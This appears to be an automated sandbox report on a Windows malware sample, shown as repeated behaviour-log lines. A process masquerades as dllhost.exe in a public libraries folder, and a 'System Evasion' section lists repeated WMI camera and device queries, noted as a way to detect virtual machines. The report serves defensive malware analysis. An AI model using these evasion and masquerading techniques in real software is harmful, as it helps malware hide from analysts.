Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\Public\Libraries\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
